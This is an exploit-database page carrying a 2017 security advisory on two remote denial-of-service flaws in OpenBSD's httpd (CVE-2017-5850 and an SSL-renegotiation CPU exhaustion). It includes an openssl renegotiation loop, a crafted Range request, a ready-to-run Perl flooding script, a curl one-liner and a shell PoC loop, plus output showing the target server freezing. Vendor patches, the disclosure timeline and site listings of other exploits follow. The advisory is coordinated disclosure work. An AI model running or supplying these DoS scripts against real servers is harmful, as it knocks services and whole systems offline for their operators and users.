Menu

Search for hundreds of thousands of exploits

"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service"

Author

Exploit author

PierreKimSec

Platform

Exploit platform

openbsd

Release date

Exploit published date

2017-02-07

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
## Advisory Information

Title: Remote DoS against OpenBSD http server (up to 6.0)
Advisory URL: https://pierrekim.github.io/advisories/CVE-2017-5850-openbsd.txt
Blog URL: https://pierrekim.github.io/blog/2017-02-07-openbsd-httpd-CVE-2017-5850.html
Date published: 2017-02-07
Vendors contacted: OpenBSD
Release mode: Released
CVE: CVE-2017-5850



## Product Description

The OpenBSD project produces a FREE, multi-platform 4.4BSD-based UNIX-like operating system.



## Vulnerabilities Summary

The shipped HTTP daemon in OpenBSD (up to the latest version) is prone to 2 remote DoS.

The first vulnerability allows an attacker to consume all the CPU power from the remote server (CPU exhaustion).

The second vulnerability (Memory exhaustion) allows an attacker to consume all the RAM and the swap space on the remote side.
Processes will be killed when running out of swap space. The system will be likely to freeze.



## Details - CPU exhaustion (no CVE entry)

OpenBSD's httpd is prone to a SSL DoS with SSL renegotiation:

user@kali:~$ (sleep 1; while true;do echo R;done) | openssl s_client -connect 10.0.2.15:443
CONNECTED(00000003)
depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
verify return:1
- ---
Certificate chain
 0 s:/C=XX/ST=secure.example.com/CN=secure.example.com
   i:/C=XX/ST=secure.example.com/CN=secure.example.com
- ---
Server certificate
- -----BEGIN CERTIFICATE-----
MIIDCjCCAfICCQC0tQxJqUqQTzANBgkqhkiG9w0BAQsFADBHMQswCQYDVQQGEwJY
WDEbMBkGA1UECAwSc2VjdXJlLmV4YW1wbGUuY29tMRswGQYDVQQDDBJzZWN1cmUu
ZXhhbXBsZS5jb20wHhcNMTcwMTI3MTU0MjMzWhcNMTgwMTI3MTU0MjMzWjBHMQsw
CQYDVQQGEwJYWDEbMBkGA1UECAwSc2VjdXJlLmV4YW1wbGUuY29tMRswGQYDVQQD
DBJzZWN1cmUuZXhhbXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
AoIBAQCjIY7mMaNVLmPDA4ir59mgdQEM4TFTgz5cv9SqU4hQq0eVmpJkEfJPHErF
to5NdF2ZIqhL+F34GqZcCC8qO3xB33dAevENWWbA4KObpIybHr8bFeDYYl5GuaCO
hizmcffU3P1ztRNXB4sCTTQwkyry8ZUDaeINLGMb0HhFR9u5TJY6tSB0KMIuiBsH
1hEp8bNxUM046D0wkZkyIgM/or6uj5jRj33aYUn6ZiU8a6UKSAVZJLqziyNcQ0hA
64gS6oapUnMVYJIUDJynOhY5e8xZmD+2pB4NLTIxAEdSyQ4wQ4jBiRFVL+E68fuw
kASmrA4gAbSCO+lYBO8wCRiVOwOdAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAC1L
213ziHqFmC8nLWvvjyoHY2PRFS1ofrfciv+fpohn2GN+eVb8DGTo+KLZ910/PUPk
dzTa7eOlkvR1OG7BUlnia6pGQqizTodvzx0DGgl76k4VpEvJAOZ4f7Plry4qgr5Y
y3Fwym1k3DlNJ5Jqh8Vp2HETbqcovATsUHRS5t/oc6N2egq1DYVC5CdGRgvmmUl+
NBjKOASYoP8S4OQ51wMmXrygFqKcEkq4/GTUFEaamrbM/J+ChD9EqejSKzZ5owRh
74v10s30OylBdmfOLeyrMv5s6DnJRAdtFEH9Wg7sQDt1P3bGOsObVZlmHCtArl4k
m1nHRn8scAFP7QbHl34=
- -----END CERTIFICATE-----
subject=/C=XX/ST=secure.example.com/CN=secure.example.com
issuer=/C=XX/ST=secure.example.com/CN=secure.example.com
- ---
No client certificate CA names sent
- ---
SSL handshake has read 1548 bytes and written 503 bytes
- ---
New, TLSv1/SSLv3, Cipher is ECDHE-RSA-AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES256-GCM-SHA384
    Session-ID: DA628A16EF4F067ED81E7A26EFA18D9A7D53CBC4ED54C8F6DC11E5E60FF76530
    Session-ID-ctx: 
    Master-Key: 9235AFEBCF2A517E896A06CAA7A1AF916646DB5BB4C99B53A79627351C0FFB936EB863B0E50A67DF70A354773CF049BE
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:
    0000 - 49 f1 29 da 9e 08 f2 74-c6 f3 eb a1 c7 ee 40 bb   I.)....t......@.
    0010 - 96 75 54 c8 4f 32 53 7e-51 40 4e a8 e9 57 41 a5   .uT.O2S~Q@N..WA.
    0020 - 73 3d a9 d6 b8 f7 a0 f8-15 cb be fb f1 4d d9 81   s=...........M..
    0030 - a8 79 56 11 5d 05 32 05-49 df 2b f3 71 89 36 a1   .yV.].2.I.+.q.6.
    0040 - 93 dc b9 b5 00 48 6f 94-b1 c5 78 f8 38 3c 63 29   .....Ho...x.8<c)
    0050 - ed 45 a2 9e ae fc 7e d7-12 76 34 15 93 b1 3d 3d   .E....~..v4...==
    0060 - d7 0a 14 f1 01 a7 87 6c-50 93 25 24 5e 4f 1b fa   .......lP.%$^O..
    0070 - 51 03 4b fa 7e 23 83 99-51 f6 47 10 8c d1 0e 41   Q.K.~#..Q.G....A
    0080 - 5a f7 a5 10 33 a7 37 5d-9b 5e b0 b6 19 e7 e2 61   Z...3.7].^.....a
    0090 - ec ea 1c 72 3c 4a ec 11-0f 26 35 76 6e d9 cb 4d   ...r<J...&5vn..M
    00a0 - c7 f8 57 cb 50 f6 47 02-6b ca be cc 29 04 b7 dc   ..W.P.G.k...)...
    00b0 - e0 d1 cc 8e 5b f9 05 06-10 72 d7 b6 8e cf 42 6a   ....[....r....Bj

    Start Time: 1485536662
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)
- ---
RENEGOTIATING
depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
verify return:1
RENEGOTIATING
depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
verify return:1
RENEGOTIATING
depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
verify return:1
RENEGOTIATING
[...]



- From my test, 1 renegociation thread takes =~ 70% of CPU.

top on the main server (10.0.2.15):

14711 www       51    0 1104K 3636K run       -         1:07 69.55% httpd

Multiple threads will eat all the available CPUs and will be likely to DoS the httpd:

14711 www       63    0 1192K 3708K run       -         2:48 33.45% httpd
77207 www       63    0 1284K 3788K run       -         1:33 33.06% httpd
78835 www       62    0 1232K 3808K run       -         0:15 28.08% httpd

There is no trace of such attacks in the httpd logs.

An attacker can use tools from THC to perform SSL DoS too (openssl was the fastest solution out of the box): https://www.thc.org/thc-ssl-dos/.



## Details - Memory exhaustion (CVE-2017-5850)

A vulnerability exists in the openbsd HTTP daemon. It will result in using all the RAM and the swap space on the remote side, processes will be killed when running out of swap space. The system will be likely to freeze.

Requesting file using a file-range will result in having a httpd process doing a full malloc() of the requested file.
It appears the entry is not correctly free()'d.

Hence, it's possible to DoS the remote server by requesting a file over and over by specifying a custom file range, ie:

    GET /index.html HTTP/1.1
    Range: bytes=1-
    User-Agent: Pierre loves you
    Host: fill-me-with-joy

This attack is successful if an attacker can identify a 'big' file (i.e. > 10MB) served by the remote HTTP server.

Here is a provided PoC (loosely based on KingCope's apache_killer.pl):

#!/usr/bin/perl -w

use warnings;
use IO::Socket;
use Parallel::ForkManager;

$numforks = 50;

if ($#ARGV < 1)
{
  &usage;
  exit;
}

while (1) {
  &killhttpd();
}

sub usage {
  print "OpenBSD HTTP Remote Denial of Service (memory exhaustion) - @PierreKimSec\n";
  print "usage: perl killobsdhttpd.pl <host> <remotefile>\n";
}

sub killhttpd {
  print "ATTACKING $ARGV[0] [using $numforks forks]\n";

  $pm = new Parallel::ForkManager($numforks);

  for (0 .. $numforks)
  {
    my $pid = $pm->start and next;
    my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                     PeerPort => "80",
                                     Proto    => 'tcp');
    $p = "GET $ARGV[1] HTTP/1.1\r\nRange: bytes=1-\r\nAccept: */*\r\nHost: $ARGV[0]\r\nConnection: close\r\n\r\n";
    print $sock $p;
    if (<$sock>) {sleep (0.5); $sock->close();}
    $pm->finish;
  }
  $pm->wait_all_children;
}


An attacker can use curl to replicate the PoC:

    curl --limit-rate 1 --continue-at 1 --header "Host: www.example.com" http://target/10mb.fs

Stopping the curl process and launching it again will produce one of the remote httpd to use more than 10MB of memory
for each request (the size of the 10mb.fs is 10MB) and will DoS the http server and the OpenBSD system by exhausting
all the RAM. The OpenBSD system will likely freeze within minutes.


PoC with curl (more effective than the perl version, it appears):

#!/bin/sh
# ./$0 www.target.tld /path/to/file

unset http_proxy
unset https_proxy

for i in $(seq 0 300)
do
  echo sending a req
  curl --limit-rate 1 --continue-at 1 --header "Host: $1" http://$1/$2 2>/dev/null >/dev/null &
  sleep 0.5
  pkill curl
done
while sleep 1
do
  echo "sending a req (slow)"
  curl --limit-rate 1 --continue-at 1 --header "Host: $1" http://$1/$2 2>/dev/null >/dev/null &
  pkill curl
done

This attack works using HTTP and using HTTPS.

Current situation in the attacked server (SWAP is full and all the RAM is being completely used):

load averages:  7.11,  3.30,  1.38                                             foo.my.domain 10:26:41
39 processes: 6 running, 32 idle, 1 on processor                                             up  0:03
CPU states:  0.0% user,  0.0% nice,  100% system,  0.0% interrupt,  0.0% idle
Memory: Real: 569M/961M act/tot Free: 21M Cache: 49M Swap: 2039M/2040M

  PID USERNAME PRI NICE  SIZE   RES STATE     WAIT      TIME    CPU COMMAND
  48965 www       28    0 1345M  204M run       -         0:05  0.00% httpd
  43060 www       28    0 1281M  174M run       -         0:05  0.00% httpd
  91565 www       28    0 1153M  187M run       -         0:04  0.00% httpd
  63038 www        2    0  948K    4K idle      kqread    0:00  0.00% httpd



We see the daemons (httpd and sshd) don't answer anymore:

user@kali:~$ 10.0.2.15 80
Trying 10.0.2.15...
Connected to 10.0.2.15.
Escape character is '^]'.

^]
telnet> q
Connection closed.
user@kali:~$ telnet 10.0.2.15 80
Trying 10.0.2.15...
Connected to 10.0.2.15.
Escape character is '^]'.

^]
telnet> q
Connection closed.
user@kali:~$ telnet 10.0.2.15 22
Trying 10.0.2.15...
Connected to 10.0.2.15.
Escape character is '^]'.

^]
telnet> q
Connection closed.
Connection closed by foreign host.



## Vendor Response

o The issue about memory exhaustion has been solved in two ways:
- - OpenBSD 6.0/5.9: Erratas has been issued at:
https://ftp.openbsd.org/pub/OpenBSD/patches/6.0/common/017_httpd.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/5.9/common/034_httpd.patch.sig

- - OpenBSD -current: We reimplemented support for byte ranges in
- -current.  The previous implementation was flawed indeed, as it tried
to load the complete ranges into memory at once.


o High CPU usage is a well-known issue of client-initiated
renegotiation.  While this can cause higher than normal CPU usage, the
processes are still able to service requests.

As httpd uses LibreSSL's libtls, a sane TLS API on top of libssl, we
decided to disable client-initiated renegotiation for libtls servers
in -current.  This change was already planned and has now been
committed to LibreSSL.

libssl http://marc.info/?l=openbsd-cvs&m=148587695222112&w=2
libtls http://marc.info/?l=openbsd-cvs&m=148587827322528&w=2



## Report Timeline

* Jan 25, 2017: Vulnerabilities found by Pierre Kim.
* Jan 30, 2017: OpenBSD team is notified of the vulnerabilities.
* Jan 30, 2017: OpenBSD team replies that they will study the advisory.
* Jan 31, 2017: OpenBSD team confirms the vulnerabilities.
* Jan 31, 2017: Pierre Kim asks for CVE entries.
* Jan 31, 2017: OpenBSD team releases security patches.
* Feb 01, 2017: cve-assign () mitre org assigns CVE-2017-5850 and asks for more details.
* Feb 07, 2017: A public advisory is sent to security mailing lists.



## Credit

These vulnerabilities were found by Pierre Kim (@PierreKimSec).



## References

https://pierrekim.github.io/blog/2017-02-07-openbsd-httpd-CVE-2017-5850.html
https://pierrekim.github.io/advisories/CVE-2017-5850-openbsd.txt
https://ftp.openbsd.org/pub/OpenBSD/patches/6.0/common/017_httpd.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/5.9/common/034_httpd.patch.sig



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJYmMPLAAoJEMQ+Dtp9ky28SpUP/AvB7lMxjIlmMQi7XJFMgxTX
0h3WixpI4tunSKyqC9BflMQRyFQgQ5AX8oh0s2OPJbeVc4RsHf2FBMru6NsvIoyR
Tn537GqqYZ19FpQZOYxEtGVd4SbK+LagtY9xkn4c/Tzd+moDv56e3QKl7AtdLETq
P/GM+n5I/aN0sSYPDBR8XxYS9HrDPFjPADB3qgM4Jef+TBpTnP/yL2SFwPgGosrq
05Exo00tK6YXr3zHFAJb/a4Q2L8/nHgZIpLi2iTkISGcOEzWVT3gFeiCdC0cYLHM
iqCet2eDqEG6UhpP0eQQrFqM30WQ+8z1nDBj4wxX07Np0ZTWkYRw+ezXDYFHIMLE
uCkVJRRm2zZOTfq8qxTldhE1wyNtd+cEBScT9+7+Xz5NN9Fq3zg47XC8AWQkH7tD
IAcIF+4aO7NAWT9Y5Q+UR0r9aTXn8fGorj9/I5d7g5fWTUKujQjnscuZQ/4e0+1B
yb2KAO3Al8s4LQnbqXU/qJ5y/tm+Ra7kxRdogRHpkDR8TwCTwHtTMz+mxGtbIL3X
C0plD5sde6MlYCnkd8WKEBb0bBYyR3leaew6s0dx7iz+smQWe9wXufvMLjQgkP6/
6xfRPyQWOxc4KCWiB5kalQ2soOFVeHbHWimG3/+39qNOb8dY7XA1+0wmYKtdDKvR
3x5MojAce/XvKlx7Cy02
=MAFw
-----END PGP SIGNATURE-----
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-02-26 "OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution" remote openbsd "Qualys Corporation"
2019-12-30 "OpenBSD - Dynamic Loader chpass Privilege Escalation (Metasploit)" local openbsd Metasploit
2019-12-16 "OpenBSD 6.x - Dynamic Loader Privilege Escalation" local openbsd "Qualys Corporation"
2018-11-30 "xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation" local openbsd "Marco Ivaldi"
2018-10-30 "xorg-x11-server 1.20.3 - Privilege Escalation" local openbsd "Marco Ivaldi"
2017-06-28 "OpenBSD - 'at Stack Clash' Local Privilege Escalation" local openbsd "Qualys Corporation"
2017-02-07 "OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service" dos openbsd PierreKimSec
2009-04-14 "OpenBSD 4.5 - IP datagram Null Pointer Deref Denial of Service" dos openbsd nonroot
2009-04-13 "OpenBSD 4.5 - IP datagrams Remote Denial of Service" dos openbsd Rembrandt
2008-07-01 "OpenBSD 4.0 - 'vga' Local Privilege Escalation" local openbsd "lul-disclosure inc."
Release Date Title Type Platform Author
2017-03-08 "Wireless IP Camera (P2P) WIFICAM - Remote Code Execution" remote hardware PierreKimSec
2017-02-07 "OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service" dos openbsd PierreKimSec 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected